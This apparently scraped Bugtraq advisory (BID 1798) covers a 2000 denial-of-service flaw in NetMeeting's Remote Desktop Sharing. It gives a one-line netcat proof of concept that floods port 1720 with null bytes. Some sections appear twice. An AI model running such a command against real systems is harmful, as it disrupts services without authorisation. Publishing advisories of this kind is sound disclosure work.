Microsoft NetMeeting Remote Desktop Sharing DoS Vulnerability
BID:1798
Info
Microsoft NetMeeting Remote Desktop Sharing DoS Vulnerability
| Bugtraq ID: | 1798 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Oct 13 2000 12:00AM |
| Updated: | Oct 13 2000 12:00AM |
| Credit: | Discovered by Kirk Corey <[email protected]> and publicized in a Microsoft Security Bulletin (MS00-077) on October 13, 2000. |
| Vulnerable: |
Microsoft NetMeeting 3.0.1 4.4.3385 |
| Not Vulnerable: | |
Discussion
Microsoft NetMeeting Remote Desktop Sharing DoS Vulnerability
The Remote Desktop Sharing component of Microsoft NetMeeting for Windows NT 4.0 / 2000 does not properly handle a particular type of malformed input string sent over port 1720. CPU utilization can be caused to spike to 100% and any existing NetMeeting sessions would fail in the event of an attack. Restarting the application would be required in order to regain normal functionality.
NetMeeting, including the affected component Remote Desktop Sharing, is shipped with Microsoft 2000 but is not enabled by default. NetMeeting can be downloaded as an add-on for NT 4.0.
*A new variant of this vulnerability has been discovered, the result of the new variant is the same as the originally discovered issue. No further technical details have been made available. User's are encouraged to install the latest patch.
The Remote Desktop Sharing component of Microsoft NetMeeting for Windows NT 4.0 / 2000 does not properly handle a particular type of malformed input string sent over port 1720. CPU utilization can be caused to spike to 100% and any existing NetMeeting sessions would fail in the event of an attack. Restarting the application would be required in order to regain normal functionality.
NetMeeting, including the affected component Remote Desktop Sharing, is shipped with Microsoft 2000 but is not enabled by default. NetMeeting can be downloaded as an add-on for NT 4.0.
*A new variant of this vulnerability has been discovered, the result of the new variant is the same as the originally discovered issue. No further technical details have been made available. User's are encouraged to install the latest patch.
Exploit / POC
Microsoft NetMeeting Remote Desktop Sharing DoS Vulnerability
nc target 1720 < /dev/zero
nc target 1720 < /dev/zero
Solution / Fix
Microsoft NetMeeting Remote Desktop Sharing DoS Vulnerability
Solution:
A new variant of this vulnerability has been discovered, the result of the new variant is the same as the originally discovered issue. No further technical details have been made available.
Microsoft encourages user's to install the latest patch. Note that the patch for Windows NT 4.0 has not yet been released.
Microsoft NetMeeting 3.0.1 4.4.3385
Solution:
A new variant of this vulnerability has been discovered, the result of the new variant is the same as the originally discovered issue. No further technical details have been made available.
Microsoft encourages user's to install the latest patch. Note that the patch for Windows NT 4.0 has not yet been released.
Microsoft NetMeeting 3.0.1 4.4.3385
References
Microsoft NetMeeting Remote Desktop Sharing DoS Vulnerability
References:
References: